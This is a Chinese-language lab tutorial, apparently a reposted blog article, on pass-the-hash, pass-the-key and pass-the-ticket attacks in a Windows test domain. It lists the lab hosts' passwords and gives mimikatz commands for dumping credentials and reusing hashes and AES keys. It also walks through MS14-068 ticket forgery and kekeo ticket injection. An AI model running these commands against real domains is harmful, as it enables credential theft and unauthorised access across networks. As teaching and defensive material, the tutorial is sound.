環境準備:

2008 r2 webserver
域內 web 服務器
本地管理員賬號密碼 :
.\administraotr:admin!@#45
當前機器域用戶密碼 :
god\webadmin:admin!@#45
2003 x86 fileserver
域內檔案服務器
本地管理員賬號密碼 :
administrator : admin
當前機器域用戶密碼 :
god\fileadmin : Admin12345
2008 r2 x64 dc god.org
主域控機器
域管賬號密碼:
God\administrator : Admin12345
2012 sqlserver
域內資料庫服務器
本地管理員賬號密碼 :
.\administrator:admin!@#45
當前機器域用戶密碼 :
god\dbadmin:admin!@#45
w7 x64 mary-pc
域內個人機
本地管理員賬號密碼 :
.\mary : admin
當前機器域用戶密碼 :
god\mary : admin!@#45
w8.1 x64 jack-pc
域內個人機
本地管理員賬號密碼 :
.\jack : admin
當前機器域用戶密碼 :
god\boss : Admin12345
一、PTH
1.介紹
什么是 PTH 攻擊?
pass the hash(hash傳遞攻擊,簡稱 PTH),在一個計算機域中,為了方便管理,登錄計算機時大多使用的域賬號,若攻擊者獲得了其中一臺主機的 LM 或 NTLM HASH 值,就可以通過哈希傳遞的方法登錄內網中其它的計算機,從而實作內網橫向移動,
PTH 攻擊的優點:在目標主機中我們通常很難獲取到明文密碼,而使用 hash,無需明文密碼即可正常登錄,
PTH 攻擊利用條件
- 被 pth 攻擊的計算機未打補丁(KB2871997)
- 拿到一臺域成員主機并且拿到管理員組的域用戶的 NTML
- 對方主機存在相同賬號并且是管理員組成員
2.演示
可使用 mimikatz 輸入如下命令獲取 LM 和 NTLM
sekurlsa::logonpasswords
使用已獲得的 NTLM 值嘗試連接
sekurlsa::pth /user:用戶名 /domain:域名 /ntlm:NTLM 值

在彈出的 cmd 視窗輸入命令查看已連接上的主機檔案

二、PTK
1.介紹
什么是 PTK 攻擊?
pass the key (密鑰傳遞攻擊,簡稱 PTK)是在域中攻擊 kerberos 認證的一種方式,原理是通過獲取用戶的aes,通過 kerberos 認證,可在NTLM認證被禁止的情況下用來實作類似pth的功能,
KB2871997 補丁和 PTK
KB2871997補丁的特點:安裝了KB2871997補丁或者系統版本大于windows server 2012時,系統的記憶體不保存明文的密碼,
KB2871997 補丁發布后常規的 Pass The Hash已經無法成功(除了 SID 500 賬號例外),但是還可以通過AES密鑰來替代NTLM驗證進行橫向的操作,
KB22871997是否真的能防御PTH攻擊?https://www.freebuf.com/column/220740.html
2.演示
可使用 mimikatz 輸入如下命令獲取 aes256
sekurlsa::ekeys
使用已獲得的 aes256 值嘗試連接
sekurlsa::pth /user:用戶名 /domain:域名 /aes256:aes256 值
三、PTT
1.介紹
什么是 PTT 攻擊?
Pass-the-Ticket 攻擊是一類利用后攻擊,涉及盜竊和重復使用 Kerberos 票證,以在受感染的環境中對系統進行身份驗證,在 Pass-the-Ticket 攻擊中,攻擊者從一臺計算機上竊取 Kerberos 票證,并重新使用它來訪問受感染環境中的另一臺計算機,
PTT 與 PTH 的區別
Pass-the-hash 和 pass-the-ticket 之間的一個主要區別是 Kerberos TGT ticket 會過期(默認為10小時),而 NTLM hashes 只有在用戶改變密碼時才會改變,因此,TGT 票必須在其有效期內使用,或者可以續期更長的時間(7天),
2.演示
(1)MS14-068
MS14-068 是密鑰分發中心(KDC)服務中的Windows漏洞,它允許經過身份驗證的用戶在其 Kerberos 票證(TGT)中插入任意的 PAC(表示所有用戶權限的結構),該漏洞位于 kdcsvc.dll 域控制器的密鑰分發中心(KDC)中,普通用戶可以通過呈現具有改變了 PAC 的 Kerberos TGT 來獲得票證,進而偽造票據獲得管理員權限,
MS14-068 利用工具下載地址:
https://github.com/abatchy17/WindowsExploits/tree/master/MS14-068
利用流程
查看當前 sid
whoami/user

清空當前機器中所有憑證(如果有域成員憑證會影響憑證偽造)
mimikatz # kerberos::purge

利用 ms14-068 生成 TGT 資料
ms14-068.exe -u 域成員名@域名 -s sid -d 域控制器地址 -p 域成員密碼


票據注入記憶體
kerberos::ptc [email protected]

查看憑證串列
klist

漏洞利用成功
dir \\192.168.3.21\c$

(2)利用工具 kekeo
kekeo 是 gentilkiwi 開源的一個工具,我們也可以用它來實作票據傳遞,
下載地址:https://github.com/gentilkiwi/kekeo/releases
利用流程
生成票據
tgt::ask /user:Administrator /domain:god.org /ntlm:ccef208c6485269c20db2cad21734fe7

匯入票據
kerberos::ptt [email protected][email protected]

利用 net use 載入
dir \\192.168.3.21\c$

轉載請註明出處,本文鏈接:https://www.uj5u.com/qita/501259.html
標籤:其他
下一篇:TF-GNN踩坑記錄(一)
